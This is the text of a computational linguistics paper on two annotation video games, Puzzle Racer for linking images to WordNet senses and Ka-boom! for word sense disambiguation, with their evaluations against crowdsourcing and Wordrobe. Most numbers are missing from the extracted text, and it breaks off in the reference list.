lapata. submitted / ; revised / ; revised / ; published / . c© association for computational linguistics. tion task with game elements, we start from a video game that is playable alone and build the task into the game as a central component. by focusing on the game aspect, players are presented with a more fa- miliar task, which leads to higher engagement. fur- thermore, the video game interface can potentially attract more interest from the large percentage of the populace who play video games. in two video games, we demonstrate how certain linguistic annotation tasks can be effectively repre- sented as video games. the first video game, puz- zle racer, produces a mapping between images and wordnet senses (fellbaum, ), thereby creating a large-scale library of visual analogs of concepts. while resources such as imagenet (deng et al., ) provide a partial sense-image mapping, they are limited to only a few thousand concrete noun senses, whereas puzzle racer annotates all parts of speech and both concrete and abstract senses. fur- thermore, puzzle racer’s output enables new visual games for tasks using word senses such as word sense disambiguation, frame detection, and selec- tional preference acquisition. the second game, ka-boom!, performs word sense disambiguation (wsd) to identify the meaning of a word in context by players interacting with pictures. sense annota- tion is regarded to be one of the most challenging nlp annotation tasks (fellbaum et al., ; ed- monds and kilgarriff, ; palmer et al., ; art- stein and poesio, ), so we view it as a challeng- ing application for testing the limits of visual nlp games. our work provides the following four contribu- tions. first, we present a new game-centric design methodology for nlp games with a purpose. sec- ond, we demonstrate with the first game that video games can produce linguistic annotations equal in quality to those of experts and at a cost reduc- tion from gathering the same annotations via crowd- sourcing; with the second game we show that video games provide a statistically significant performance improvement over a current state-of-the-art non- video game with a purpose for sense annotation. third, we release both games as a platform for other researchers to use in building new games and for annotating new data. fourth, we provide multiple resources produced by the games: ( ) an image li- brary mapped to noun, verb, and adjective word- net senses, consisting of , images across senses, ( ) a set of associated word labels for most images, ( ) sense annotations as a distribution over images and senses, and ( ) mappings between word senses and related web queries. related work games with a purpose multiple works have pro- posed linguistic annotation-based games with a pur- pose for tasks such as anaphora resolution (hladká et al., ; poesio et al., ), paraphrasing (chklovski and gil, ), term associations (artig- nan et al., ; lafourcade and joubert, ; van- nella et al., ), acquiring common sense knowl- edge (kuo et al., ; herdağdelen and baroni, ), and wsd (chklovski and mihalcea, ; seemakurty et al., ; venhuizen et al., ). notably, all of these linguistic games have play- ers primarily interacting with text, in contrast to other highly successful games with a purpose such as foldit (cooper et al., ), in which players fold protein sequences, and the esp game (von ahn and dabbish, ), where players label images with words. most similar to our games are wordrobe (ven- huizen et al., ) and jinx (seemakurty et al., ), which perform wsd, and the knowledge towers (vannella et al., ), which associates im- ages with senses. wordrobe asks players to disam- biguate nouns and verbs using multiple choice ques- tions where options are sense definitions and disam- biguation is limited to terms with at most five senses, a limitation that does not exist in our games. jinx uses two players who both have to independently provide lexical substitutes of an ambiguous word and are then scored on the basis of their shared sub- stitutes. while jinx has a more game-like feel, pro- ducing annotations from the substitutes is non-trivial and requires looking for locality of the substitutes in the wordnet graph. in contrast to wordrobe and jinx, we provide a game-centric design methodology for the seamless integration of the annotation task into a video game with dynamic, graphical elements. the knowledge towers (tkt) is a video game for validating the associations between images and word senses in babelnet (navigli and ponzetto, ) and associating each of the senses with new images acquired from a web query of one of the sense’s lemmas. to perform the annotation, players are shown a word and its definition and then asked to retrieve pictures matching that definition during game play. in contrast, our puzzle racer game is purely vi- sual and does not require players to read defini- tions, instead showing picture examples, increas- ing its video game-like quality. furthermore, puz- zle racer is tested on nouns, verbs, and adjectives whereas tkt is only applicable to annotate nouns since it relies on the babelnet knowledge base to acquire its initial set of image-sense associations, which contains images only for nouns. image libraries associating images with con- ceptual entities is a long-standing goal in com- puter vision (barnard et al., ) and two ap- proaches have built large-scale image libraries based on the wordnet hypernym ontology. the data set of torralba et al. ( ) contains over m im- ages across all , non-abstract wordnet noun synsets. however, to support the size of the data set, images are down-scaled to x pixels; fur- thermore, their image-sense mapping error rates vary between - % with more general concepts having higher error rates. the second significant image library comes from imagenet (deng et al., ), which contains . m high-resolution images for , non-abstract wordnet noun synsets. no- tably, both libraries focus only on concrete nouns. in contrast, the present work provides a methodol- ogy for generating image-sense associations for all parts of speech and for both abstract and concrete concepts. within nlp resources, babelnet (navigli and ponzetto, ) merges wikipedia and word- net sense inventories and contains mappings from wordnet senses to the pictures present on the cor- responding wikipedia page. however, since images come from an encyclopedia, the associations are in- herently limited to only nouns and, due to inherently partial mapping, only . % of the wordnet senses have images, with an average of . images for those senses. the present work also varies from pre- vious approaches in that image-sense pairs are rated according to the strength of association between the image and sense, rather than having a binary un- graded association. crowdsourced wsd many nlp areas have ap- plied crowdsourcing (wang et al., ); of these areas, the most related to this work is crowdsourc- ing word sense annotations. despite initial success in performing wsd using crowdsourcing (snow et al., ), many approaches noted the difficulty of performing wsd with untrained annotators, espe- cially as the degree of polysemy increases or when word senses are related. several approaches have attempted to make the task more suitable for un- trained annotators by ( ) using the crowd itself to define the sense inventory (biemann and nygaard, ), thereby ensuring the crowd understands the sense distinctions, ( ) modifying the questions to explicitly model annotator uncertainty (hong and baker, ; jurgens, ), or ( ) using sophis- ticated methods to aggregate multiple annotations (passonneau et al., ; passonneau and carpen- ter, ). in all cases, annotation was purely text based, in contrast to our work. game : puzzle racer the first game was designed to fill an important need for enabling engaging nlp games: image repre- sentations of concepts, specifically wordnet senses. our goals are two-fold: ( ) to overcome the limits of current sense-image libraries, which have focused largely on concrete nouns and ( ) to provide a gen- eral game platform for annotation tasks that need to associate lexical items with images. following, we first describe the design, annotation process, and ex- tensibility of the game, and then discuss how its in- put data is generated. a live demonstration of the game is available online. . design and game play puzzle racer was designed to be as “video game- like” as possible, with no mentioning of linguistic terminology. because the game is targeted for the layperson, we view this a fundamental design ob- jective to make the game more engaging and long- lasting. therefore, puzzle racer is modeled after popular games such as temple run and subway surfers, but with the twist of combining two game genres: racing and puzzle solving. racing provides the core of game play, while the annotation is em- bedded as puzzle solving during and after the race. http://www.knowledgeforge.org following, we describe the game play and then de- tail how playing produces annotations. racing to race, players navigate a race car along a linear track filled with obstacles and enemy pieces. during play, players collect coins, which can be used to obtain non-annotation achievements and to increase their score. enemies were added to intro- duce variety into the game and increase the strategy required to keep playing. players begin the race with – health points, depending on the racer chosen, which are decreased when touching enemies. dur- ing game play, players may collect power-ups with familiar actions such as restoring lost health, dou- bling their speed, or acting as a magnet to collect coins. to bring a sense of familiarity, the game was designed using a combination of sprites, sound ef- fects, and music from super mario world, mario kart , and custom assets created by us. races initially last for seconds, but may last longer if players collect specific power-ups that add time. puzzle solving prior to racing, players are shown three images, described as “puzzle clues,” and in- structions asking them to find the common theme in the three pictures (fig. a). then, during rac- ing, players encounter obstacles, referred to as puz- zle gates, that show a series of images. to stay alive, players must navigate their racer through the one picture in the series with the same theme as the puzzle clues. players activate a gate after touching one of its images; a gate may only be activated once and racer movement over other pictures has no ef- fect. puzzle gates appear at random intervals during game play. two types of gate appear. in the first, the gate shows pictures where one picture is known to be re- lated to the puzzle clues. we refer to these as golden gates. racing over an unrelated image in a golden gate causes the player to lose one health point, which causes the race to end if their health reaches zero. the second type of gate, referred to as a mystery gate, shows three images that are potentially related to the clue. moving over an image in a mystery gate has no effect on health. prior to activating a gate, there is no visual difference between the two gates. figure b shows a racer approaching a puzzle gate. upon first moving their racer on one of the gate’s images, the player receives visual and audi- tory feedback based on the type of gate. in the case of a golden gate, the borders around all pic- tures change colors showing which picture should have been selected, a feedback icon appears on the chosen picture (shown in figure c), and an appro- priate sound effect plays. for mystery gates, borders become blue, indicating the gate has no effect. finally, when the race ends, players are asked to solve the race’s puzzle by entering a single word that describes the race’s puzzle theme. for example, in the race shown in figure , an answer of “paper” would solve the puzzle. correctly answering the puzzle doubles the points accumulated by the player during the race. the initial question motivates play- ers to pay attention to picture content shown during the race; the longer the player stays alive, the more clues they can observe to help solve the puzzle. annotation image-sense annotation takes place by means of the puzzle gates. each race’s puzzle theme is based on a specific wordnet sense. ini- tially, each sense is associated with a small set of gold standard images, g, and a much larger set of potentially-associated images, u, whose quality is unknown. at the start of a race, three gold stan- dard images are randomly selected from g to serve as puzzle clues. the details of gold standard image selection are described later in sec. . . we note that not all gold standard images are shown initially as puzzle clues, helping mask potential differences between golden and mystery gates. mystery gates annotate the images in u. the im- ages in a mystery gate are chosen by selecting the least-rated image in u and then pairing it with n- random images from u, where n is the number of pictures shown per gate. by always including the least-rated image, we guarantee that, given sufficient plays, all images for a sense will eventually be rated. when a player chooses an image in the mystery gate, that image receives n- positive votes for it being a good depiction of the sense; the remaining unse- lected images receive one negative vote. thus, an image’s rating is the cumulative sum of the positive and negative votes it receives. this rating scheme is zero-sum so image ratings cannot become inflated such that all images have a positive rating. how- ever, we do note that if u includes many related im- ages, due to the voting, some good images may have (a) puzzle clues (b) a puzzle gate prior to activation (c) an activated puzzle gate figure : screenshots of the key elements of the puzzle racer game negative ratings if even-better images become higher ranked. golden gates are used to measure how well a player understands the race’s puzzle concept (i.e., the sense being annotated). the first three puzzle gates in a race are always golden gates. we denote the percentage of golden gates correctly answered thus far as α. after the three initial golden gates are shown, the type of new puzzle gates is metered by α: golden gates are generated with probability . + . ( − α) and mystery gates are generated for the remainder. in essence, accurate players with high α are more likely to be shown mystery gates that annotate pictures from u, whereas completely inaccurate players are prevented from adding new annotations. this mechanism adjusts the number of new annotations a player can produce in real- time based on their current accuracy at recogniz- ing the target concept, which is not currently pos- sible in common crowdsourcing platforms. last, we note that puzzle answering also provides labels for the race’s images, data that might prove valu- able for tasks such as image labeling (mensink et al., ) and image caption generation (feng and lapata, ; kulkarni et al., ). additional game elements puzzle racer incor- porates a number of standard game with a purpose design elements (von ahn and dabbish, ), with two notable features: unlockable achievements and a leaderboard. players initially start out with a sin- gle racer and power-up available. players can then unlock new racers and power-ups through various game play actions of varying difficulty, e.g., cor- rectly answering three puzzle questions in a row. this feature proved highly popular and provided an extrinsic motivation for continued playing. sec- ond, players were ranked according to level, which was determined by the number of correct puzzle an- swers, correct golden gates, and their total score. the top-ranking players were shown at the end of every round and via a special screen in-game. a full, live-updated leaderboard was added halfway through the study and proved an important feature for new players to use in competing for the top ranks. extensibility at its core, puzzle racer provides three central annotation-related mechanics: ( ) an initial set of instructions on how players are to inter- act with images, ( ) multiple series of images shown during game play, and ( ) an open-ended question at the end of the game. these mechanics can be easily extended to other types of annotation where players must choose between several concepts shown as op- tions in the puzzle gates. for example, the instruc- tions could show players a phrase such as “a bowl of *” and ask players to race over images of things that might fit the “*” argument in order to obtain se- lectional preference annotations of the phrase (à la flati and navigli ( )); the lemmas or senses as- sociated with the selected images can be aggregated to identify the types of arguments preferred by play- ers for the game’s provided phrase. similarly, the in- structions could be changed to provide a set of key- words or phrases (instead of images associated with a sense) and ask players to navigate over images of the words in order to perform image labeling. nouns argument, arm, atmosphere, bank, difficulty, disc, interest, paper, party, shelter verbs activate, add, climb, eat, encounter expect, rule, smell, suspend, win adjectives different, important, simple table : lemmas for puzzle racer and ka-boom! . image data puzzle racer requires sets of images g and u as in- put. both were constructed using image queries via the yahoo! boss api as follows. three annotators were asked to each produce three queries for each sense of a target word and, for each query, to se- lect three images as gold standard images. queries were checked for uniqueness and to ensure that at least a few of its image results were related to the sense. each query was used to retrieve one result set of images. two additional annotators then vali- dated the queries and gold standard images produced by the first three annotators. validation ensured that each sense had at least three queries and |g| ≥ for all senses. after validation, the gold standard im- ages were added to g and all non-gold images in the result set were added to u, discarding duplicates. during game play, puzzle clues are sampled across queries, rather than sampling directly from g. query-based sampling ensures that players are not biased towards images for a single visual repre- sentation of the sense. while the construction of g and u is manual, we note that alternate methods of constructing the sets could be considered, including automatic ap- proaches such as those used by imagenet (deng et al., ). however, as the focus of this game is on ranking images, a manual process was used to en- sure high-quality images in g. importantly, we stress that the images in g alone are often insufficient due to two reasons. first, most senses – especially those denoting abstract concepts – can be depicted in many ways. relying on a small set of images for a sense can omit common visual- izations, which may limit downstream applications that require general representations. second, many games rely on a sense of novelty, i.e., not seeing the same pictures repeatedly; however, limiting the im- ages to those in g can create issues where too few disc n: a flat circular plate circular plate dish plate plate paper n: a daily or weekly publication on folded sheets news paper daily newspaper newspaper headline simple a: elementary, simple, uncomplicated simple problem + = elementary equation win v: be the winner in a contest or competition olympic winner lottery winner world cup victory table : examples of queries used to gather images images exist to keep player interest high. while ad- ditional manual annotation could be used to select more gold standard images, such a process is time- intensive; hence, one of our game’s purposes is to eventually move high-quality images from u to g. puzzle racer annotation analysis puzzle racer is intended to produce a sense-image mapping comparable to what would be produced by crowdsourcing. therefore, we performed a large- scale study involving over players and , images. two experiments were performed. first, we directly compared the quality of the game-based an- notations with those of crowdsourcing. second, we compared the difference in quality between expert- based gold standard images and the highest-ranked images rated by players. . experimental setup to test the potential of our approach, we selected a range of polysemous noun, verb, and adjec- tive lemmas, shown in table . lemmas had - senses each, for a total of senses. many lemmas have both abstract and concrete senses and some are known to have highly-related senses (erk and mc- carthy, ). hence, given their potential annota- tion difficulty, we view performance on these lem- mas as a lower bound. for all lemmas, during the image generation pro- cess (sec. . ) annotators were able to produce queries for all but one sense, expect v; this produced gold images in g and , unrated images the sense expect v has the definition, “consider obligatory; request and expect.” annotators were able to formulate many queries that could have potentially shown images of this defi- nition, but the images results of such queries were consistently unrelated to the meaning. interest n: a sense of concern with and curiosity about someone or something eat v: take in solid food different a: unlike in nature or quality or form or degree party n: a group of people gathered to- gether for pleasure expect v: be pregnant with shelter n: temporary housing for home- less or displaced persons table : examples of gold standard images in u. tables and show examples of the queries and gold standard images, respectively. the game play study was conducted over two weeks using a pool of undergraduate students, who were allowed to recruit other students. after an email announcement, players participated. players were ranked according to their character’s level and provided with an incentive that the four top-ranking players at the end of the study would be provided with gift cards ranging from $ - usd, with a total compensation of $ usd. . experiment : crowdsourcing comparison the first experiment directly compares the image rankings produced by the game with those from an analogous crowdsourcing task. tasks were created on the crowdflower platform using the identical set of examples and annotation questions encoun- tered by players. in each task, workers were shown three example gold standard images (sampled from those configurations seen by players) and asked to identify the common theme among the three exam- ples. then, five annotation questions were shown in which workers were asked to choose which of three images was most related to the theme. ques- tions were created after the puzzle racer study fin- ished in order to use the identical set of questions seen by players as mystery gates. workers were paid $ . usd per task. to compare the quality of the puzzle racer image rankings with those from crowdflower, the three highest-rated images of each sense from both rank- ings were compared. two annotators were shown a sense’s definition and example uses, and then asked to compare the quality of three image pairs, select- ing whether (a) the left image was a better depic- tion of the sense, (b) the right image was better, or (c) the images were approximately equal in quality. in the case of disagreements, a third annotator was asked to compare the images; the majority answer was used when present or, in the case of all three ratings, images were treated as equal, the latter of which occurred for only % of the questions. for all questions, the method used to rank the image was hidden and the order in which images appeared was randomized. results during the study period, players com- pleted races, generating , ratings across , images. ratings were balanced across senses, with a minimum and maximum of and ratings per sense. players accurately identi- fied each race’s theme, selecting the correct image in % of all golden puzzle gates shown. table shows example top-rated images from puzzle racer. experiment measures differences in the qual- ity of the three top-ranked images produced by puz- zle racer and crowdflower for each sense. puzzle racer and crowdflower produced similar ratings, with at least one image appearing in the top-three positions of both ranks for % of the senses. both annotators agreed in % of cases in select- ing the best sense depiction, finding that in % of the agreed cases both images were approximately equal representations of the sense. in the remain- ing, the puzzle racer image was better in % and activate v: aerate (sewage) so as to favor the growth of organisms that decompose organic matter argument n: a contentious speech act; a dispute where there is strong disagree- ment atmosphere n: the weather or climate at some place climb v: go upward with gradual or con- tinuous progress important a: of great significance or value rule v: decide with authority table : examples of the three highest-rated images for six senses crowdflower image better in %. when resolu- tions from a third annotator were included, a similar trend emerges: both images were equivalent in % of all cases, puzzle racer images were preferred in % and crowflower images in %. these results show that, as a video game, puzzle racer produces very similar results to what would be expected under equivalent conditions with crowdsourcing. . experiment : image quality the second experiment evaluates the ability of the games to produce high-quality images by measur- ing the difference in quality between gold stan- dard images and top-rated images in the game. crowdflower workers were shown a question with a sense’s definition and example uses and then asked to choose which of two images was a better visual representation of the gloss. questions were created for each of the three highest-rated images for each sense, pairing each with a randomly-selected gold standard image for that sense. image order was ran- domized between questions. five questions were shown per task and workers were paid $ . usd per task. the worker responses were aggre- gated by selecting each question’s most frequent an- swer. results for senses within each part of speech, workers preferred the gold standard image to the workers were paid more for the second task to adjust for the time required to read each question’s sense definition and example uses; thus, hourly compensation rates in the two ex- periments were approximately equivalent. top-rated image for nouns, verbs, and adjectives . %, . %, and . % of the time, respectively. this preference is not significant at p < . , indi- cating that the top-ranked images produced through puzzle racer game play are approximately equiva- lent in quality to images manually chosen by experts with full knowledge of the sense inventory. . cost comparison puzzle racer annotations cost $ , or $ . usd per rating. in comparison, the analogous crowd- flower annotations cost $ . , or $ . usd per annotation. because the game’s costs are fixed, the cost per annotation is driven down as players compete. as a result, puzzle racer reduces the an- notation cost to ≤ % of that required by crowd- sourcing. we note that other factors could have con- tributed to the cost reduction over crowdsourcing be- yond the video game itself. however, as we demon- strate in vannella et al. ( ), players will play a video game with a purpose without compensation just as much as they do when compensated using a similar setup as was performed in this experiment. hence, the video game itself is likely the largest mo- tivating factor for the cost reduction. video game-based annotation does come with in- direct costs due to game development. for example, poesio et al. ( ) report spending £ , over a two-year period to develop their linguistic game with a purpose. in contrast, puzzle racer was cre- ated using open source software in just over a month and developed in the context of a java programming class, removing any professional development costs. furthermore, puzzle racer is easily extensible for other text-image annotation tasks, enabling the plat- form to be re-used with minimal effort. the decreased cost does come with an increase in the time per annotation. all tasks on the crowd- flower platform required only a few hours to com- plete, whereas the puzzle racer data was gathered over the two-week contest period. the difference in collection time reflects an important difference in the current resources: while crowdsourcing has established platforms with on-demand workers, no central platforms exist for games with a purpose with an analogous pool of game players. however, although the current games were released in a lim- ited fashion, later game releases to larger venues such as facebook may attract more players and sig- nificantly decrease both collection times and overall annotation cost. game : ka-boom! building large-scale sense-annotated corpora is a long-standing objective (see (pilehvar and navigli, )) and has sparked significant interest in de- veloping effective crowdsourcing annotation and gwap strategies (cf. sec. ). therefore, we pro- pose a second video game, ka-boom!, that produces sense annotations from game play. a live demon- stration of the game is available online. design and game play ka-boom! is an action game in the style of the popular fruit ninja game: pictures are tossed on screen from the boundaries of the screen, which the player must then selectively destroy in order to score points. the game’s chal- lenge stems from rapidly identifying which pictures should be destroyed or not destroyed as they appear. prior to the start of a round, players are shown a sentence with a word in bold (fig. a) and asked to envision pictures related to that word’s meaning in the context. players are then instructed to de- stroy pictures that do not remind them of the bolded word’s meaning and let live pictures showing some- thing reminiscent. once finished reading the instruc- tions, players begin a round of game play that shows ( ) images for each sense of the word and ( ) im- ages for unrelated lemmas, referred to as distractor images. http://www.knowledgeforge.org/ players destroy pictures by clicking or touching them, depending on their device’s input (fig. b). players are penalized for failing to destroy the dis- tractor images. rounds begin with a limit of at most three pictures on screen at once, which increases as the round progresses. the additional images pro- vide two important benefits: ( ) an increasing de- gree of challenge to keep the player’s interest, ( ) more image interactions to use in producing the an- notation. additionally, the increasing picture rate enables us to measure the interaction between game play speed and annotation quality in order to help tune the speeds of future games. the round ends when players fail to destroy five or more distrac- tor images or seconds elapses. ending the game early after players fail to destroy distractor images provides ka-boom! a mechanism for limiting the impact of inaccurate or adversarial players on anno- tation quality. after game play finishes, players are shown their score and all the lemma-related pictures they spared (fig. c), proving a positive feedback loop where players can evaluate their choices. annotation traditionally, sense annotation is per- formed by having an annotator examine a word in context and then chose the word’s sense from a list of definitions. ka-boom! replaces the sense defini- tions with image examples of that sense. a sense an- notation is built from the senses associated with the images that the player spared. images are presented to players based on a sequence of flights. each flight contains one randomly-selected picture for each of a word’s n senses and n distractor images. images within a flight are randomly ordered. the structure of a flight’s images ensures that, as the game pro- gresses, players see the same number of images for each sense; otherwise, the player’s annotation may become biased simply due to one sense’s images ap- pearing more often. once the game ends, the senses associated with the spared images are aggregated to produce a sense distribution. for simplicity, the sense with the high- est probability is selected as the player’s answer; in the case of ties, multiple senses are reported, though, we note that the game’s annotation method could also produce a weighted distribution over senses (erk et al., ), revealing different meanings that a player considered valid in the context. (a) the context and target word (b) players destroying images (c) the round-over summary figure : screenshots of the three key elements of the ka-boom! game the highest probability of a sense from this distri- bution is then multiplied by the duration of the game to produce the player’s score for the round. players maximize their score when they consistently choose images associated with a single sense, which encour- ages precise game play. the annotation design of having players destroy unrelated images was motivated by two factors. first, the mechanism of destroying unrelated images does not introduce noise into the annotation when a player mistakenly destroys an image; because only retained images count towards the sense annotation, players may be highly selective in which images they retain – even destroying some images that are associated with the correct sense – while still pro- ducing a correct annotation. second, our internal testing showed the objective of destroying unrelated pictures keeps players more actively engaged. in the inverse type of play where players destroy only re- lated pictures, players often had to wait for a single picture to destroy, causing them to lose interest. extensibility ka-boom! contains two core me- chanics: ( ) instructions on which pictures should be destroyed and which should be spared, and ( ) series of images shown to the player during game play. as with puzzle racer, the ka-boom! mechan- ics can be modified to extend the game to new types of annotation. for example, instructions could dis- play picture examples and ask players to destroy ei- ther similar or opposite-meaning ideas in order to annotate synonyms or antonyms. in another setting, images can be associated with semantic frames (e.g., from framenet (baker et al., )) and players must spare images showing the frame of the game’s sentence in order to provide frame annotations. ka-boom! annotation analysis ka-boom! is intended to provide a complementary and more-enjoyable method for sense annotation us- ing only pictures. to test its effectiveness, we per- form a direct comparison with the state-of-the-art gwap for sense annotation, wordrobe (venhuizen et al., ), which is not a video game. . experimental setup organizers of the wordrobe project (venhuizen et al., ) provided a data set of recently- annotated contexts having between one and nine games played for each (mean . games). this data was distinct from the contexts used to evaluate wor- drobe in venhuizen et al. ( ) in which case all contexts had six games played each. contexts were for noun and verb lemmas with a total of senses (mean . senses per word). contexts were assigned the most-selected sense label from the wor- drobe games. to gather the images for each lemma used with ka-boom!, we repeated a similar image-gathering process as done for the gold standard images in puzzle racer. annotators generated at least three queries for each sense, selecting three images for each query as gold standard examples of the sense. during annotation, four senses could not be asso- ciated with any queries that produced high-quality images. in total, images were gathered, with an average of . images per sense. the query data and unrated images are included in the data set, but were not used further in ka-boom! experiments. game players were drawn from a small group of . . . . . . . . . a v e ra g e w s d a c c u ra c y flights of pictures seen all nouns verbs mfs random figure : players’ average wsd accuracy within a single game relative to the number of flights seen accuracy method all noun verb ka-boom! . . . wordrobe . . . mfs . . . random . . . table : sense disambiguation accuracies fluent english speakers and were free to recruit other players. a total of players participated. unlike puzzle racer, players were not compensated. each context was seen in at least six games. wsd performance is measured using the tradi- tional precision and recall definitions and the f measure of the two (navigli, ); because all items are annotated, precision and recall are equiv- alent and we report performance as accuracy. per- formance is measured relative to two baselines: ( ) a baseline that picks the sense of the lemma that is most frequent in semcor (miller et al., ), de- noted as mfs, and ( ) a baseline equivalent to per- formance if players had randomly clicked on im- ages, denoted as random. . results two analyses were performed. because ka- boom! continuously revises the annotation during gameplay based on which pictures players spare, the first analysis assesses how the accuracy changes this baseline is similar to random sense selection but takes into account differences in the number of pictures per sense. with respect to the length of one ka-boom! game. the second analysis measures the accuracy with re- spect to the number of games played per context. in the first analysis, each context’s annotation was evaluated using the most-probable sense after each flight of gameplay. figure shows results after six games were played. players were highly accurate at playing, surpassing the mfs baseline after see- ing two flights of pictures (i.e., two pictures for each sense). accuracy remained approximately equiva- lent after three rounds for noun lemmas, while verb lemmas showed a small drop-off in performance. we believe that the increased rate at which images occur on screen likely caused lower performance, where players were unable to react quickly enough. many noun lemmas had easily-recognizable associ- ated images, so higher-speed game play may still be accurate. in contrast, verbs were more general (e.g., “decide,” “concern,” and “include”), which required more abstract thinking in order to recognize an asso- ciated picture; as the game speed increased, players were not able to identify these associated pictures as easily, causing slightly decreased performance. table shows the players’ disambiguation accu- racy after three flights in comparison to the play- ers’ accuracy with wordrobe and the two baselines. ka-boom! provides an increased performance over wordrobe that is statistically significant at p < . . ka-boom! also provides a performance in- crease over the mfs baseline, though it is statisti- cally significant only at p = . . the time required to gather annotations after three flights varied based on the number of senses, but was under a minute in all cases, which puts the rate of annotation on par with that of expert-based annotation (krishnamurthy and nicholls, ). in the second analysis, disambiguation accuracy was measured based on the number of games played for a context. because the provided wordrobe data set has . games played per context on aver- age, results are reported only for the subset of con- texts played in at least four wordrobe games in or- der to obtain consistent performance estimates. ka- we note that, although venhuizen et al. ( ) report a higher accuracy for wordrobe in their original experiments ( . f ), that performance was measured on a different data set and used six games per context. in all cases, players played at most one game per context. . . . . . . . . . a v e ra g e w s d a c c u ra c y number of games played ka-boom! all ka-boom! nouns ka-boom! verbs mfs wordrobe all wordrobe nouns wordrobe verbs random figure : average wsd accuracy as a function of the number of games played for a context boom! annotations are recorded after three flights were seen in each game. figure shows the perfor- mance relative to the number of annotators for both ka-boom! and wordrobe, i.e., the number of games played for that context by different players. for nouns, ka-boom! is able to exceed the mfs baseline after only two games are played. for both nouns and verbs, multiple rounds of ka-boom! game play improve performance. in contrast to ka- boom!, wordrobe accuracy declines as the number of players increases; when multiple players disagree on the sense, no clear majority emerges in wor- drobe, lowering the accuracy of the resulting anno- tation. in contrast, a single player in ka-boom! pro- duces multiple sense judgments for a context in a single game via interacting with each flight of im- ages. these interactions provide a robust distribu- tional annotation over senses that can be easily ag- gregated with other players’ judgments to produce a higher-quality single sense annotation. this analysis suggests that ka-boom! can produce accurate anno- tations with just a few games per context, removing the need for many redundant annotations and im- proving the overall annotation throughput. conclusion and future work in this work we have presented a new model of lin- guistic games with a purpose focused on annota- tion using video games. our contributions show that designing linguistic annotation tasks as video games can produce high-quality annotations. in the first game, puzzle racer, we demonstrated that game play can produce a high-quality library of images as- sociated with wordnet senses, equivalent to those produced by expert annotators. moreover, puzzle racer reduces the cost of producing an equivalent resource via crowdsourcing by at least % while providing similar-quality image ratings. in the sec- ond game, ka-boom!, we demonstrated that a video game could be used to perform accurate word sense annotation with a large improvement over the mfs baseline and a statistically significant improvement over current game-based wsd. while not all linguistic annotations tasks are eas- ily representable as video games, our two games provide an important starting point for building new types of nlp games with a purpose based on video games mechanics. software for both games will be open-sourced, providing a new resource for future game development and extensions of our work. fur- thermore, the multiple data sets produced by this work are available at http://lcl.uniroma . it/videogames, providing ( ) a sense-image mapping from hundreds of senses to tens of thou- sands of images, ( ) word labels for most images in our dataset, ( ) web queries associated with all senses, and ( ) image-based word sense annotations. based on our results, three directions for future work are planned. the two games presented here focus on concepts that can be represented visually and thus lend themselves to annotations for lexi- cal semantics. however, the fact that the games are graphical does not prevent them from showing textual items (see vannella et al. ( )) and more apt video games could be developed for text-based annotations such as pp-attachment or pronoun res- olution. therefore, in our first future work, we plan to develop new types of video games for tex- tual items as well as extend the current games for new semantic tasks such as selectional preferences and frame annotation. second, we plan to scale up both games to a broader audience such as face- book, creating a larger sense-image library and a standard platform for releasing video games with a purpose. third, we plan to build multilingual games using the images from puzzle racer, which provide a language-independent concept representation, and could therefore be used to enable the annotation and validation of automatically-created knowledge re- sources (hovy et al., ). acknowledgments the authors gratefully acknowl- edge the support of the erc start- ing grant multijedi no. . we thank the many game players whose collective passion for video games made this work possible. references guillaume artignan, mountaz hascoët, and mathieu lafourcade. . multiscale visual analysis of lexi- cal networks. in proceedings of the international con- ference on information visualisation, pages – . ron artstein and massimo poesio. . inter-coder agreement for computational linguistics. computa- tional linguistics, ( ): – . collin f. baker, charles j. fillmore, and john b. lowe. . the berkeley framenet project. in pro- ceedings of the th international conference on computational linguistics and th annual meet- ing of the association for computational linguistics, montréal, québec, canada, – august , mon- treal, canada. kobus barnard, pinar duygulu, david forsyth, nando de freitas, david m. blei, and michael i. jordan. . matching words and pictures. the journal of machine learning research, : – . chris biemann and valerie nygaard. . crowdsourc- ing wordnet. in the th international conference of the global wordnet association (gwc- ). jon chamberlain, karën fort, udo kruschwitz, math- ieu lafourcade, and massimo poesio. . using games to create language resources: successes and limitations of the approach. in iryna gurevych and jungi kim, editors, the people’s web meets nlp, the- ory and applications of natural language processing, pages – . springer. tim chklovski and yolanda gil. . improving the design of intelligent acquisition interfaces for collect- ing world knowledge from web contributors. in pro- ceedings of the international conference on knowl- edge capture, pages – . acm. tim chklovski and rada mihalcea. . building a sense tagged corpus with open mind word expert. in proceedings of acl workshop on wsd: re- cent successes and future directions, philadelphia, pa, usa. seth cooper, firas khatib, adrien treuille, janos bar- bero, jeehyung lee, michael beenen, andrew leaver- fay, david baker, zoran popović, and foldit players. . predicting protein structures with a multiplayer online game. nature, ( ): – . jia deng, wei dong, richard socher, li-jia li, kai li, and li fei-fei. . imagenet: a large-scale hier- archical image database. in proceedings of the con- ference on computer vision and pattern recognition (cvpr), pages – . philip edmonds and adam kilgarriff. . introduc- tion to the special issue on evaluating word sense dis- ambiguation systems. natural language engineering, ( ): – . katrin erk and diana mccarthy. . graded word sense assignment. in proceedings of the confer- ence on empirical methods in natural language pro- cessing (emnlp), pages – , singapore. katrin erk, diana mccarthy, and nicholas gaylord. . measuring word meaning in context. computa- tional linguistics, ( ): – . christiane fellbaum, joachim grabowski, and shari lan- des. . performance and confidence in a semantic annotation task. in christiane fellbaum, editor, word- net: an electronic lexical database, pages – . mit press. christiane fellbaum, editor. . wordnet: an elec- tronic database. mit press, cambridge, ma. yansong feng and mirella lapata. . automatic caption generation for news images. ieee transac- tions on pattern analysis and machine intelligence, ( ): – . tiziano flati and roberto navigli. . spred: large- scale harvesting of semantic predicates. in proceed- ings of the st annual meeting of the association for computational linguistics (acl), pages – , sofia, bulgaria. amaç herdağdelen and marco baroni. . bootstrap- ping a game with a purpose for common sense col- lection. acm transactions on intelligent systems and technology, ( ): – . barbora hladká, jiřı́ mı́rovskỳ, and pavel schlesinger. . play the language: play coreference. in pro- ceedings of the joint conference of the association for computational linguistics and international joint conference of the asian federation of natural lan- guage processing (acl-ijcnlp), pages – . as- sociation for computational linguistics. jisup hong and collin f. baker. . how good is the crowd at “real” wsd? in proceedings of the fifth linguistic annotation workshop (law v), pages – . acl. eduard h. hovy, roberto navigli, and simone paolo ponzetto. . collaboratively built semi-structured content and artificial intelligence: the story so far. artificial intelligence, : – . david jurgens. . embracing ambiguity: a compar- ison of annotation methodologies for crowdsourcing word sense labels. in proceedings of the conference of the north american chapter of the association of computational linguistics (naacl), pages – . ramesh krishnamurthy and diane nicholls. . peel- ing an onion: the lexicographer’s experience of man- 